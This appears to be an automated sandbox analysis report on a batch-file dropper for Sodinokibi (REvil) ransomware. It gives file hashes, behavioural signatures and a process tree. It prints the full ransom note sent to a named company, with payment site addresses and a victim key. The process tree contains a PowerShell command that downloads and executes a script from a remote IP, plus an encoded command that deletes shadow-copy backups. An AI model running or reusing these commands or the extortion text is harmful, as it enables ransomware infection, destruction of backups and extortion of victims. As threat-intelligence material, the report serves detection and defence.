Analysis
-
max time kernel
138s -
max time network
156s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
10-06-2020 16:10
General
-
Target
3ba797dc80d83cbfa6d1a0d86e44b07f.bat
-
Size
219B
-
MD5
a492ab56e248bcde0ed2adcade97bcbb
-
SHA1
bab084b7f54cee67117b058033b07cd52fe76647
-
SHA256
8e2a0ee5856819aeb0f3e6c7e4815ad8491e263e90ef0ee6de93751a2e2aa455
-
SHA512
3117a250261ea69a1d2ffd0cc04a7a7226ddc03f9d12a9bcb5eeff111677343c875341145328d4f5dd5c90de920363d47bf324c3fe119b00419f35b2ee688567
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/3ba797dc80d83cbfa6d1a0d86e44b07f
Extracted
Path
C:\5lh273zx0w-TrimegahSecurities-readme.txt
Family
sodinokibi
Ransom Note
---=== Welcome Trimegah Securities, PT TBK. Again. ===---
[+] Whats Happen? [+]
Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 5lh273zx0w.
By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).
[+] What guarantees? [+]
Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.
To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.
If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money.
[+] How to get access on website? [+]
You have two ways:
1) [Recommended] Using a TOR browser!
a) Download and install TOR browser from this site: https://torproject.org/
b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/7646EE8075DC4CF7
2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
b) Open our secondary website: http://decryptor.cc/7646EE8075DC4CF7
3) If you still have problems accessing the site, you can write to us at: [email protected], indicating the external IP address, country, key EO59IJ6aombDpXt0fRUA+bm2s7UObSdjSzWOdMLvyGbAnuYMSVHTnJvxyAgNYCto
cksAF2gLAiXh0321xTnfMqmFyEf4MMc/SD61+PxwYdXq/hRsJkoZN9hU6RfTprMr
breILaK35//ATrxuvw950yhLugilGZH6mW3o9Ti2MyqRAghR1Ld/MqCLWkWTIiXo
wF79/msXxstn0EKoi2pkSfzN9qsn9w/atTmVIwrF37shTy+SJRG1yZSAqkTnET/F
bKQLMrfT6Z6tRxwYVB768J9IbPZGtdpkH4AGljhZEYRzo9XCMnM5umqg/QOeIvPl
KKk11QU3Iw0Q4oDlOgmD/qswlwh+8JiHZqAowKR+/EWK3Ym+j5lAf/KW+CfjemEo
olhLdGezZfprIGp1AqkBrcp+IzUsp5H83vrMiosYx7IjHVzJcg4c9O3AwC6zSHS3
eXHcSqjubuysGQa1noezGTI4P7738uWjIyq8YJyznPi/k1nAI6onaG0CsPu3TIQR
h4lyos67k6lTktTD20+XrI029q6pfTWBFRqDUF3wGv8x2f3BpSWxRi7biv1c0/lY
KApRZX8cUHLaxNaq11IhUPB+J8qawYxvftkKHvCC7RNLfP7aWgQOgwVcOs0GL9gV
uhZ/OKEfnIluP5Bg9twOeK++lnq+/6HZlydhK401dRHrOKda7JAADIj59l0bgFHp
+dheWiBSlbtnpJjjsKUHjnVpqrYeGEkZxDIqbavexmGAZ7IEIBv/o3KSc6glAah0
oMglakCRl8/WFHEU67lBveoI7vrUDw9DdkI39tv7mPty1QX1FNyFGIBKW/uFC1J3
Cu6YPn5CW7ZFWPYPKInCABC9fukbT+063mWuvsRaz5MAJ2xb3MZIKhKyepLIz2UC
zOndqyd+7fC2W0ZFP5vBcE9/BbJqKm+8inqaj/+7XlLJcW2+AcP+iaCuvsI27YPQ
ssp22T+eAa2bSaod9oDMFWyiyly/sJCZuCx/nyDDfOCob6LykgDaJ5ymUR5a+mVk
nAjQPdh61IgPzpig8cj4l93+KAbR+sbgpsYkcGIJeOo/p2aZMvsUg1IJrE9TJ0y9
1bakezX8jor3jq29raXiJAxkTzexjSTKXx9EVpJDOvpd+zYcvzhd7n6vEnIRWqZ4
HkZYcJ0/jTDbEkU5FVkqAlJqlV0SCmTAYvsi4RdwCuRccMxKopIaMjhS9QnGwehn
NnGbK695z+Ko3bEnXXiIzdcc5i5b76vuPiAn6qG1Ze8RIwTfkotMs0lWR/38Ykaf
GET1eeBnvDLgyTnv6sCVfAiykgvqZ/WrNENcouLftZzjsLBhq8eTCg==
and extension 5lh273zx0w
Warning: secondary website can be blocked, thats why first variant much better and more available.
When you open our website, put the following data in the input form:
Key:
EO59IJ6aombDpXt0fRUA+bm2s7UObSdjSzWOdMLvyGbAnuYMSVHTnJvxyAgNYCto
cksAF2gLAiXh0321xTnfMqmFyEf4MMc/SD61+PxwYdXq/hRsJkoZN9hU6RfTprMr
breILaK35//ATrxuvw950yhLugilGZH6mW3o9Ti2MyqRAghR1Ld/MqCLWkWTIiXo
wF79/msXxstn0EKoi2pkSfzN9qsn9w/atTmVIwrF37shTy+SJRG1yZSAqkTnET/F
bKQLMrfT6Z6tRxwYVB768J9IbPZGtdpkH4AGljhZEYRzo9XCMnM5umqg/QOeIvPl
KKk11QU3Iw0Q4oDlOgmD/qswlwh+8JiHZqAowKR+/EWK3Ym+j5lAf/KW+CfjemEo
olhLdGezZfprIGp1AqkBrcp+IzUsp5H83vrMiosYx7IjHVzJcg4c9O3AwC6zSHS3
eXHcSqjubuysGQa1noezGTI4P7738uWjIyq8YJyznPi/k1nAI6onaG0CsPu3TIQR
h4lyos67k6lTktTD20+XrI029q6pfTWBFRqDUF3wGv8x2f3BpSWxRi7biv1c0/lY
KApRZX8cUHLaxNaq11IhUPB+J8qawYxvftkKHvCC7RNLfP7aWgQOgwVcOs0GL9gV
uhZ/OKEfnIluP5Bg9twOeK++lnq+/6HZlydhK401dRHrOKda7JAADIj59l0bgFHp
+dheWiBSlbtnpJjjsKUHjnVpqrYeGEkZxDIqbavexmGAZ7IEIBv/o3KSc6glAah0
oMglakCRl8/WFHEU67lBveoI7vrUDw9DdkI39tv7mPty1QX1FNyFGIBKW/uFC1J3
Cu6YPn5CW7ZFWPYPKInCABC9fukbT+063mWuvsRaz5MAJ2xb3MZIKhKyepLIz2UC
zOndqyd+7fC2W0ZFP5vBcE9/BbJqKm+8inqaj/+7XlLJcW2+AcP+iaCuvsI27YPQ
ssp22T+eAa2bSaod9oDMFWyiyly/sJCZuCx/nyDDfOCob6LykgDaJ5ymUR5a+mVk
nAjQPdh61IgPzpig8cj4l93+KAbR+sbgpsYkcGIJeOo/p2aZMvsUg1IJrE9TJ0y9
1bakezX8jor3jq29raXiJAxkTzexjSTKXx9EVpJDOvpd+zYcvzhd7n6vEnIRWqZ4
HkZYcJ0/jTDbEkU5FVkqAlJqlV0SCmTAYvsi4RdwCuRccMxKopIaMjhS9QnGwehn
NnGbK695z+Ko3bEnXXiIzdcc5i5b76vuPiAn6qG1Ze8RIwTfkotMs0lWR/38Ykaf
GET1eeBnvDLgyTnv6sCVfAiykgvqZ/WrNENcouLftZzjsLBhq8eTCg==
-----------------------------------------------------------------------------------------
!!! DANGER !!!
DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data.
!!! !!! !!!
ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.
!!! !!! !!!
!!! !!! ATTENTION !!! !!!
We want to warn you that in case of refusal to pay, we will post your confidential files that we have downloaded for general access or will sell part of them in the shadow market.
URLs
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/7646EE8075DC4CF7
http://decryptor.cc/7646EE8075DC4CF7
Signatures
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
-
Drops file in System32 directory 1 IoCs
-
Modifies system certificate store 2 TTPs 14 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
-
Suspicious use of WriteProcessMemory 5 IoCs
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
-
Suspicious behavior: EnumeratesProcesses 77 IoCs
-
Modifies service 2 TTPs 4 IoCs
-
Enumerates connected drives 3 TTPs
-
Blacklisted process makes network request 138 IoCs
-
Drops file in Program Files directory 32 IoCs
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\3ba797dc80d83cbfa6d1a0d86e44b07f.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/3ba797dc80d83cbfa6d1a0d86e44b07f');Invoke-RVAOEIZDHXXE;Start-Sleep -s 10000"2⤵
- Sets desktop wallpaper using registry
- Drops file in System32 directory
- Modifies system certificate store
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service